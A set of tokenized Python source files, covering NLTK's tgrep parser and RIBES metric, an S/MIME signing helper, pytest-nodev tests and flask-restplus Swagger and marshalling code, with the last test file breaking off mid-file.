pyparsing . Regex ( '<STR_LIT>' ) <EOL> tgrep_node_label_use = pyparsing . Combine ( '<STR_LIT:=>' + tgrep_node_label ) <EOL> tgrep_node_label_use_pred = tgrep_node_label_use . copy ( ) <EOL> macro_name = pyparsing . Regex ( '<STR_LIT>' ) <EOL> macro_name . setWhitespaceChars ( '<STR_LIT>' ) <EOL> macro_use = pyparsing . Combine ( '<STR_LIT:@>' + macro_name ) <EOL> tgrep_node_expr = ( tgrep_node_label_use_pred | <EOL> macro_use | <EOL> tgrep_nltk_tree_pos | <EOL> tgrep_qstring_icase | <EOL> tgrep_node_regex_icase | <EOL> tgrep_qstring | <EOL> tgrep_node_regex | <EOL> '<STR_LIT:*>' | <EOL> tgrep_node_literal ) <EOL> tgrep_node_expr2 = ( ( tgrep_node_expr + <EOL> pyparsing . Literal ( '<STR_LIT:=>' ) . setWhitespaceChars ( '<STR_LIT>' ) + <EOL> tgrep_node_label . copy ( ) . setWhitespaceChars ( '<STR_LIT>' ) ) | <EOL> tgrep_node_expr ) <EOL> tgrep_node = ( tgrep_parens | <EOL> ( pyparsing . Optional ( "<STR_LIT:'>" ) + <EOL> tgrep_node_expr2 + <EOL> pyparsing . ZeroOrMore ( "<STR_LIT:|>" + tgrep_node_expr ) ) ) <EOL> tgrep_brackets = pyparsing . Optional ( '<STR_LIT:!>' ) + '<STR_LIT:[>' + tgrep_relations + '<STR_LIT:]>' <EOL> tgrep_relation = tgrep_brackets | ( tgrep_op + tgrep_node ) <EOL> tgrep_rel_conjunction = pyparsing . Forward ( ) <EOL> tgrep_rel_conjunction << ( tgrep_relation + <EOL> pyparsing . ZeroOrMore ( pyparsing . Optional ( '<STR_LIT:&>' ) + <EOL> tgrep_rel_conjunction ) ) <EOL> tgrep_relations << tgrep_rel_conjunction + pyparsing . ZeroOrMore ( <EOL> "<STR_LIT:|>" + tgrep_relations ) <EOL> tgrep_expr << tgrep_node + pyparsing . Optional ( tgrep_relations ) <EOL> tgrep_expr_labeled = tgrep_node_label_use + pyparsing . Optional ( tgrep_relations ) <EOL> tgrep_expr2 = tgrep_expr + pyparsing . ZeroOrMore ( '<STR_LIT::>' + tgrep_expr_labeled ) <EOL> macro_defn = ( pyparsing . Literal ( '<STR_LIT:@>' ) + <EOL> pyparsing . White ( ) . suppress ( ) + <EOL> macro_name + <EOL> tgrep_expr2 ) <EOL> tgrep_exprs = ( pyparsing . Optional ( macro_defn + pyparsing . ZeroOrMore ( '<STR_LIT:;>' + macro_defn ) + '<STR_LIT:;>' ) + <EOL> tgrep_expr2 + <EOL> pyparsing . ZeroOrMore ( '<STR_LIT:;>' + ( macro_defn | tgrep_expr2 ) ) + <EOL> pyparsing . ZeroOrMore ( '<STR_LIT:;>' ) . suppress ( ) ) <EOL> if set_parse_actions : <EOL> tgrep_node_label_use . setParseAction ( _tgrep_node_label_use_action ) <EOL> tgrep_node_label_use_pred . setParseAction ( _tgrep_node_label_pred_use_action ) <EOL> macro_use . setParseAction ( _tgrep_macro_use_action ) <EOL> tgrep_node . setParseAction ( _tgrep_node_action ) <EOL> tgrep_node_expr2 . setParseAction ( _tgrep_bind_node_label_action ) <EOL> tgrep_parens . setParseAction ( _tgrep_parens_action ) <EOL> tgrep_nltk_tree_pos . setParseAction ( _tgrep_nltk_tree_pos_action ) <EOL> tgrep_relation . setParseAction ( _tgrep_relation_action ) <EOL> tgrep_rel_conjunction . setParseAction ( _tgrep_conjunction_action ) <EOL> tgrep_relations . setParseAction ( _tgrep_rel_disjunction_action ) <EOL> macro_defn . setParseAction ( _macro_defn_action ) <EOL> tgrep_expr . setParseAction ( _tgrep_conjunction_action ) <EOL> tgrep_expr_labeled . setParseAction ( _tgrep_segmented_pattern_action ) <EOL> tgrep_expr2 . setParseAction ( functools . partial ( _tgrep_conjunction_action , <EOL> join_char = '<STR_LIT::>' ) ) <EOL> tgrep_exprs . setParseAction ( _tgrep_exprs_action ) <EOL> return tgrep_exprs . ignore ( '<STR_LIT:#>' + pyparsing . restOfLine ) <EOL> def tgrep_tokenize ( tgrep_string ) : <EOL> '''<STR_LIT>''' <EOL> parser = _build_tgrep_parser ( False ) <EOL> if isinstance ( tgrep_string , binary_type ) : <EOL> tgrep_string = tgrep_string . decode ( ) <EOL> return list ( parser . parseString ( tgrep_string ) ) <EOL> def tgrep_compile ( tgrep_string ) : <EOL> '''<STR_LIT>''' <EOL> parser = _build_tgrep_parser ( True ) <EOL> if isinstance ( tgrep_string , binary_type ) : <EOL> tgrep_string = tgrep_string . decode ( ) <EOL> return list ( parser . parseString ( tgrep_string , parseAll = True ) ) [ <NUM_LIT:0> ] <EOL> def treepositions_no_leaves ( tree ) : <EOL> '''<STR_LIT>''' <EOL> treepositions = tree . treepositions ( ) <EOL> prefixes = set ( ) <EOL> for pos in treepositions : <EOL> for length in range ( len ( pos ) ) : <EOL> prefixes . add ( pos [ : length ] ) <EOL> return [ pos for pos in treepositions if pos in prefixes ] <EOL> def tgrep_positions ( pattern , trees , search_leaves = True ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( pattern , ( binary_type , text_type ) ) : <EOL> pattern = tgrep_compile ( pattern ) <EOL> for tree in trees : <EOL> try : <EOL> if search_leaves : <EOL> positions = tree . treepositions ( ) <EOL> else : <EOL> positions = treepositions_no_leaves ( tree ) <EOL> yield [ position for position in positions <EOL> if pattern ( tree [ position ] ) ] <EOL> except AttributeError : <EOL> yield [ ] <EOL> def tgrep_nodes ( pattern , trees , search_leaves = True ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( pattern , ( binary_type , text_type ) ) : <EOL> pattern = tgrep_compile ( pattern ) <EOL> for tree in trees : <EOL> try : <EOL> if search_leaves : <EOL> positions = tree . treepositions ( ) <EOL> else : <EOL> positions = treepositions_no_leaves ( tree ) <EOL> yield [ tree [ position ] for position in positions <EOL> if pattern ( tree [ position ] ) ] <EOL> except AttributeError : <EOL> yield [ ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from itertools import islice <EOL> import math <EOL> from nltk . util import ngrams , choose <EOL> def sentence_ribes ( references , hypothesis , alpha = <NUM_LIT> , beta = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> best_ribes = - <NUM_LIT:1.0> <EOL> for reference in references : <EOL> worder = word_rank_alignment ( reference , hypothesis ) <EOL> nkt = kendall_tau ( worder ) <EOL> bp = min ( <NUM_LIT:1.0> , math . exp ( <NUM_LIT:1.0> - len ( reference ) / len ( hypothesis ) ) ) <EOL> p1 = len ( worder ) / len ( hypothesis ) <EOL> _ribes = nkt * ( p1 ** alpha ) * ( bp ** beta ) <EOL> if _ribes > best_ribes : <EOL> best_ribes = _ribes <EOL> return best_ribes <EOL> def corpus_ribes ( list_of_references , hypotheses , alpha = <NUM_LIT> , beta = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> corpus_best_ribes = <NUM_LIT:0.0> <EOL> for references , hypothesis in zip ( list_of_references , hypotheses ) : <EOL> corpus_best_ribes += sentence_ribes ( references , hypothesis , alpha , beta ) <EOL> return corpus_best_ribes / len ( hypotheses ) <EOL> def position_of_ngram ( ngram , sentence ) : <EOL> """<STR_LIT>""" <EOL> for i , sublist in enumerate ( ngrams ( sentence , len ( ngram ) ) ) : <EOL> if ngram == sublist : <EOL> return i <EOL> def word_rank_alignment ( reference , hypothesis , character_based = False ) : <EOL> """<STR_LIT>""" <EOL> worder = [ ] <EOL> hyp_len = len ( hypothesis ) <EOL> ref_ngrams = [ ] <EOL> hyp_ngrams = [ ] <EOL> for n in range ( <NUM_LIT:1> , len ( reference ) + <NUM_LIT:1> ) : <EOL> for ng in ngrams ( reference , n ) : <EOL> ref_ngrams . append ( ng ) <EOL> for ng in ngrams ( hypothesis , n ) : <EOL> hyp_ngrams . append ( ng ) <EOL> for i , h_word in enumerate ( hypothesis ) : <EOL> if h_word not in reference : <EOL> continue <EOL> elif hypothesis . count ( h_word ) == reference . count ( h_word ) == <NUM_LIT:1> : <EOL> worder . append ( reference . index ( h_word ) ) <EOL> else : <EOL> max_window_size = max ( i , hyp_len - i + <NUM_LIT:1> ) <EOL> for window in range ( <NUM_LIT:1> , max_window_size ) : <EOL> if i + window < hyp_len : <EOL> right_context_ngram = tuple ( islice ( hypothesis , i , i + window + <NUM_LIT:1> ) ) <EOL> num_times_in_ref = ref_ngrams . count ( right_context_ngram ) <EOL> num_times_in_hyp = hyp_ngrams . count ( right_context_ngram ) <EOL> if num_times_in_ref == num_times_in_hyp == <NUM_LIT:1> : <EOL> pos = position_of_ngram ( right_context_ngram , reference ) <EOL> worder . append ( pos ) <EOL> break <EOL> if window <= i : <EOL> left_context_ngram = tuple ( islice ( hypothesis , i - window , i + <NUM_LIT:1> ) ) <EOL> num_times_in_ref = ref_ngrams . count ( left_context_ngram ) <EOL> num_times_in_hyp = hyp_ngrams . count ( left_context_ngram ) <EOL> if num_times_in_ref == num_times_in_hyp == <NUM_LIT:1> : <EOL> pos = position_of_ngram ( left_context_ngram , reference ) <EOL> worder . append ( pos + len ( left_context_ngram ) - <NUM_LIT:1> ) <EOL> break <EOL> return worder <EOL> def find_increasing_sequences ( worder ) : <EOL> """<STR_LIT>""" <EOL> items = iter ( worder ) <EOL> a , b = None , next ( items , None ) <EOL> result = [ b ] <EOL> while b is not None : <EOL> a , b = b , next ( items , None ) <EOL> if b is not None and a + <NUM_LIT:1> == b : <EOL> result . append ( b ) <EOL> else : <EOL> if len ( result ) > <NUM_LIT:1> : <EOL> yield tuple ( result ) <EOL> result = [ b ] <EOL> def kendall_tau ( worder , normalize = True ) : <EOL> """<STR_LIT>""" <EOL> worder_len = len ( worder ) <EOL> increasing_sequences = find_increasing_sequences ( worder ) <EOL> num_increasing_pairs = sum ( choose ( len ( seq ) , <NUM_LIT:2> ) for seq in increasing_sequences ) <EOL> num_possible_pairs = choose ( worder_len , <NUM_LIT:2> ) <EOL> tau = <NUM_LIT:2> * num_increasing_pairs / num_possible_pairs - <NUM_LIT:1> <EOL> if normalize : <EOL> return ( tau + <NUM_LIT:1> ) / <NUM_LIT:2> <EOL> else : <EOL> return tau <EOL> def spearman_rho ( worder , normalize = True ) : <EOL> """<STR_LIT>""" <EOL> worder_len = len ( worder ) <EOL> sum_d_square = sum ( ( wi - i ) ** <NUM_LIT:2> for wi , i in zip ( worder , range ( worder_len ) ) ) <EOL> rho = <NUM_LIT:1> - sum_d_square / choose ( worder_len + <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> if normalize : <EOL> return ( rho + <NUM_LIT:1> ) / <NUM_LIT:2> <EOL> else : <EOL> return rho </s>
<s> from __future__ import with_statement <EOL> import os <EOL> import re <EOL> import warnings <EOL> from . context import StreamPositionRestore <EOL> RE_KEY = re . compile ( "<STR_LIT>" <EOL> "<STR_LIT>" , re . S ) <EOL> RE_CERTS = re . compile ( "<STR_LIT>" <EOL> "<STR_LIT>" , re . S ) <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def parse_keyfile ( keyfile ) : <EOL> """<STR_LIT>""" <EOL> with StreamPositionRestore ( keyfile ) : <EOL> kf = keyfile . read ( ) <EOL> key = RE_KEY . search ( kf ) <EOL> certs = RE_CERTS . finditer ( kf ) <EOL> return ( str ( key . group ( <NUM_LIT:0> ) ) , <EOL> str ( certs . next ( ) . group ( <NUM_LIT:0> ) ) , <EOL> ( str ( c . group ( <NUM_LIT:0> ) ) for c in certs ) <EOL> ) <EOL> try : <EOL> import subprocess <EOL> from tempfile import NamedTemporaryFile <EOL> from functools import wraps <EOL> try : <EOL> check_output = subprocess . check_output <EOL> except AttributeError : <EOL> def check_output ( * args , ** kw ) : <EOL> kw [ "<STR_LIT>" ] = subprocess . PIPE <EOL> return subprocess . Popen ( * args , ** kw ) . communicate ( ) [ <NUM_LIT:0> ] <EOL> def find_executable ( name ) : <EOL> """<STR_LIT>""" <EOL> is_windows = os . name != "<STR_LIT>" <EOL> def check ( path ) : <EOL> return ( os . path . isfile ( path ) and <EOL> ( not is_windows or os . access ( path , os . X_OK ) ) ) <EOL> if not is_windows and not name . lower ( ) . endswith ( "<STR_LIT>" ) : <EOL> name += "<STR_LIT>" <EOL> if check ( name ) : <EOL> return name <EOL> for cand in os . environ [ "<STR_LIT>" ] . split ( os . pathsep ) : <EOL> cand = os . path . join ( cand , name ) <EOL> if check ( cand ) : <EOL> return cand <EOL> return None <EOL> openssl = find_executable ( "<STR_LIT>" ) <EOL> if not openssl : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> def sign_openssl ( keyfile , content ) : <EOL> """<STR_LIT>""" <EOL> key , cs , stack = parse_keyfile ( keyfile ) <EOL> with NamedTemporaryFile ( ) as signer : <EOL> print >> signer , key <EOL> print >> signer , cs <EOL> signer . flush ( ) <EOL> with NamedTemporaryFile ( ) as certfile : <EOL> for c in stack : <EOL> print >> certfile , c <EOL> certfile . flush ( ) <EOL> with NamedTemporaryFile ( ) as infile : <EOL> infile . write ( content ) <EOL> infile . flush ( ) <EOL> return check_output ( ( openssl , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , signer . name , <EOL> "<STR_LIT>" , certfile . name , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , infile . name ) , <EOL> bufsize = <NUM_LIT:0> ) <EOL> @ wraps ( sign_openssl ) <EOL> def sign_openssl_warn ( * args , ** kw ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( openssl , ) , <EOL> RuntimeWarning <EOL> ) <EOL> return sign_openssl ( * args , ** kw ) <EOL> sign_openssl_warn . generator = sign_openssl . generator = check_output ( ( openssl , "<STR_LIT:version>" ) ) . strip ( ) <EOL> except ImportError : <EOL> sign_openssl_warn = sign_openssl = None <EOL> try : <EOL> import M2Crypto as M2 <EOL> import M2Crypto . SMIME as M2S <EOL> import M2Crypto . X509 as M2X509 <EOL> from M2Crypto . BIO import MemoryBuffer as M2Buffer <EOL> from M2Crypto . EVP import EVPError as M2EVPError <EOL> def sign_m2 ( keyfile , content ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( keyfile , "<STR_LIT:name>" ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> with NamedTemporaryFile ( ) as kp : <EOL> with StreamPositionRestore ( kp ) : <EOL> with StreamPositionRestore ( keyfile ) : <EOL> kp . write ( keyfile . read ( ) ) <EOL> return sign_m2 ( kp , content ) <EOL> try : <EOL> stack = M2X509 . X509_Stack ( ) <EOL> _ , _ , certificates = parse_keyfile ( keyfile ) <EOL> for c in certificates : <EOL> cert = M2X509 . load_cert_string ( c ) <EOL> if ( cert . check_ca ( ) <EOL> and str ( cert . get_issuer ( ) ) == str ( cert . get_subject ( ) ) ) : <EOL> continue <EOL> stack . push ( cert ) <EOL> smime = M2S . SMIME ( ) <EOL> smime . load_key ( keyfile . name ) <EOL> smime . set_x509_stack ( stack ) <EOL> pkcs7 = M2Buffer ( ) <EOL> smime . sign ( M2Buffer ( content ) , <EOL> M2S . PKCS7_DETACHED | M2S . PKCS7_BINARY <EOL> ) . write_der ( pkcs7 ) <EOL> return pkcs7 . read ( ) <EOL> except M2EVPError , ex : <EOL> if re . search ( "<STR_LIT>" , ex . message ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> sign_m2 . generator = "<STR_LIT>" % M2 . version <EOL> except ImportError : <EOL> sign_m2 = None <EOL> sign = sign_m2 or sign_openssl_warn <EOL> if not sign : <EOL> raise ImportError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from builtins import list <EOL> import pytest <EOL> from pytest_nodev import blacklists <EOL> from pytest_nodev import collect <EOL> def test_import_coverage ( ) : <EOL> """<STR_LIT>""" <EOL> from imp import reload <EOL> reload ( blacklists ) <EOL> reload ( collect ) <EOL> def test_collect_stdlib_distributions ( ) : <EOL> stdlib_distributions = list ( collect . collect_stdlib_distributions ( ) ) <EOL> assert len ( stdlib_distributions ) == <NUM_LIT:1> <EOL> _ , module_names = stdlib_distributions [ <NUM_LIT:0> ] <EOL> assert len ( module_names ) > <NUM_LIT:10> <EOL> def test_collect_installed_distributions ( ) : <EOL> installed_distributions = list ( collect . collect_installed_distributions ( ) ) <EOL> assert len ( installed_distributions ) > <NUM_LIT:1> <EOL> for spec , module_names in installed_distributions : <EOL> if spec . startswith ( '<STR_LIT>' ) : <EOL> break <EOL> assert module_names == [ '<STR_LIT>' ] <EOL> def test_collect_distributions ( ) : <EOL> distributions = list ( collect . collect_distributions ( [ '<STR_LIT>' ] ) ) <EOL> assert len ( distributions ) == <NUM_LIT:1> <EOL> _ , module_names = distributions [ <NUM_LIT:0> ] <EOL> assert len ( module_names ) == <NUM_LIT:1> <EOL> assert len ( list ( collect . collect_distributions ( [ '<STR_LIT>' ] ) ) ) == <NUM_LIT:0> <EOL> def test_import_module ( ) : <EOL> assert collect . import_module ( '<STR_LIT>' ) <EOL> with pytest . raises ( ImportError ) : <EOL> collect . import_module ( '<STR_LIT>' , module_blacklist_pattern = '<STR_LIT>' ) <EOL> with pytest . raises ( ImportError ) : <EOL> collect . import_module ( '<STR_LIT>' ) <EOL> def test_import_distributions ( ) : <EOL> distributions = [ ( '<STR_LIT>' , [ '<STR_LIT>' ] ) ] <EOL> module_names = list ( collect . import_distributions ( distributions ) ) <EOL> assert module_names == [ '<STR_LIT>' ] <EOL> distributions = [ ( '<STR_LIT>' , [ '<STR_LIT>' ] ) ] <EOL> module_names = list ( collect . import_distributions ( distributions ) ) <EOL> assert module_names == [ ] <EOL> def test_generate_module_objects ( ) : <EOL> expected_item = ( '<STR_LIT>' , collect . generate_module_objects ) <EOL> assert expected_item in list ( collect . generate_module_objects ( collect ) ) <EOL> def test_generate_objects_from_modules ( ) : <EOL> import re <EOL> modules = { '<STR_LIT>' : collect , '<STR_LIT>' : re } <EOL> include_patterns = [ '<STR_LIT>' ] <EOL> objs = collect . generate_objects_from_modules ( <EOL> modules , include_patterns , module_blacklist_pattern = '<STR_LIT>' ) <EOL> assert len ( list ( objs ) ) == <NUM_LIT:1> <EOL> def test_object_from_name ( ) : <EOL> object_ = collect . object_from_name ( '<STR_LIT>' ) <EOL> assert object_ is collect . object_from_name <EOL> object_ = collect . object_from_name ( '<STR_LIT>' ) <EOL> assert object_ == collect . NOMATCH_PATTERN . upper </s>
<s> from __future__ import unicode_literals <EOL> from flask import url_for , Blueprint , render_template <EOL> class Apidoc ( Blueprint ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . registered = False <EOL> super ( Apidoc , self ) . __init__ ( * args , ** kwargs ) <EOL> def register ( self , * args , ** kwargs ) : <EOL> super ( Apidoc , self ) . register ( * args , ** kwargs ) <EOL> self . registered = True <EOL> apidoc = Apidoc ( '<STR_LIT>' , __name__ , <EOL> template_folder = '<STR_LIT>' , <EOL> static_folder = '<STR_LIT>' , <EOL> static_url_path = '<STR_LIT>' , <EOL> ) <EOL> @ apidoc . add_app_template_global <EOL> def swagger_static ( filename ) : <EOL> return url_for ( '<STR_LIT>' , <EOL> filename = '<STR_LIT>' . format ( filename ) ) <EOL> def ui_for ( api ) : <EOL> '''<STR_LIT>''' <EOL> return render_template ( '<STR_LIT>' , title = api . title , <EOL> specs_url = api . specs_url ) </s>
<s> from __future__ import unicode_literals <EOL> from flask_restplus import ( <EOL> marshal , marshal_with , marshal_with_field , fields , Api , Resource <EOL> ) <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from ordereddict import OrderedDict <EOL> from . import TestCase <EOL> class HelloWorld ( Resource ) : <EOL> def get ( self ) : <EOL> return { } <EOL> class MarshallingTestCase ( TestCase ) : <EOL> def test_marshal ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> marshal_dict = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> output = marshal ( marshal_dict , model ) <EOL> self . assertEquals ( output , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> def test_marshal_with_envelope ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> marshal_dict = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> output = marshal ( marshal_dict , model , envelope = '<STR_LIT>' ) <EOL> self . assertEquals ( output , { '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } ) <EOL> def test_marshal_decorator ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> @ marshal_with ( model ) <EOL> def try_me ( ) : <EOL> return OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEquals ( try_me ( ) , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> def test_marshal_decorator_with_envelope ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> @ marshal_with ( model , envelope = '<STR_LIT>' ) <EOL> def try_me ( ) : <EOL> return OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEquals ( try_me ( ) , { '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } ) <EOL> def test_marshal_decorator_tuple ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> @ marshal_with ( model ) <EOL> def try_me ( ) : <EOL> headers = { '<STR_LIT>' : <NUM_LIT> } <EOL> return OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <NUM_LIT:200> , headers <EOL> self . assertEquals ( try_me ( ) , ( { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , <NUM_LIT:200> , { '<STR_LIT>' : <NUM_LIT> } ) ) <EOL> def test_marshal_decorator_tuple_with_envelope ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> @ marshal_with ( model , envelope = '<STR_LIT>' ) <EOL> def try_me ( ) : <EOL> headers = { '<STR_LIT>' : <NUM_LIT> } <EOL> return OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <NUM_LIT:200> , headers <EOL> self . assertEquals ( try_me ( ) , <EOL> ( { '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } , <NUM_LIT:200> , { '<STR_LIT>' : <NUM_LIT> } ) ) <EOL> def test_marshal_field_decorator ( self ) : <EOL> model = fields . Raw <EOL> @ marshal_with_field ( model ) <EOL> def try_me ( ) : <EOL> return '<STR_LIT:foo>' <EOL> self . assertEquals ( try_me ( ) , '<STR_LIT:foo>' ) <EOL> def test_marshal_field_decorator_tuple ( self ) : <EOL> model = fields . Raw <EOL> @ marshal_with_field ( model ) <EOL> def try_me ( ) : <EOL> return '<STR_LIT:foo>' , <NUM_LIT:200> , { '<STR_LIT>' : <NUM_LIT> } <EOL> self . assertEquals ( ( '<STR_LIT:foo>' , <NUM_LIT:200> , { '<STR_LIT>' : <NUM_LIT> } ) , try_me ( ) ) <EOL> def test_marshal_field ( self ) : <EOL> model = OrderedDict ( { '<STR_LIT:foo>' : fields . Raw ( ) } ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> self . assertEquals ( output , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> def test_marshal_tuple ( self ) : <EOL> model = OrderedDict ( { '<STR_LIT:foo>' : fields . Raw } ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> output = marshal ( ( marshal_fields , ) , model ) <EOL> self . assertEquals ( output , [ { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ] ) <EOL> def test_marshal_tuple_with_envelope ( self ) : <EOL> model = OrderedDict ( { '<STR_LIT:foo>' : fields . Raw } ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> output = marshal ( ( marshal_fields , ) , model , envelope = '<STR_LIT>' ) <EOL> self . assertEquals ( output , { '<STR_LIT>' : [ { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ] } ) <EOL> def test_marshal_nested ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . Nested ( { <EOL> '<STR_LIT>' : fields . String , <EOL> } ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , OrderedDict ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) <EOL> ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_nested_with_non_null ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . Nested ( <EOL> OrderedDict ( [ <EOL> ( '<STR_LIT>' , fields . String ) , <EOL> ( '<STR_LIT>' , fields . String ) <EOL> ] ) , allow_null = False ) ) <EOL> ] ) <EOL> marshal_fields = [ OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None ) ] ) ] <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = [ OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , OrderedDict ( [ ( '<STR_LIT>' , None ) , ( '<STR_LIT>' , None ) ] ) ) <EOL> ] ) ] <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_nested_with_null ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . Nested ( <EOL> OrderedDict ( [ <EOL> ( '<STR_LIT>' , fields . String ) , <EOL> ( '<STR_LIT>' , fields . String ) <EOL> ] ) , allow_null = True ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , None ) ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_allow_null_presents_data ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . Nested ( <EOL> OrderedDict ( [ <EOL> ( '<STR_LIT>' , fields . String ) , <EOL> ( '<STR_LIT>' , fields . String ) <EOL> ] ) , allow_null = True ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , OrderedDict ( [ ( '<STR_LIT>' , None ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) <EOL> ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_nested_property ( self ) : <EOL> class TestObject ( object ) : <EOL> @ property <EOL> def fee ( self ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . Nested ( <EOL> OrderedDict ( [ <EOL> ( '<STR_LIT>' , fields . String ) , <EOL> ( '<STR_LIT>' , fields . String ) <EOL> ] ) , allow_null = True ) ) <EOL> ] ) <EOL> obj = TestObject ( ) <EOL> obj . foo = '<STR_LIT:bar>' <EOL> obj . bat = '<STR_LIT>' <EOL> output = marshal ( [ obj ] , model ) <EOL> expected = [ OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , OrderedDict ( [ <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , 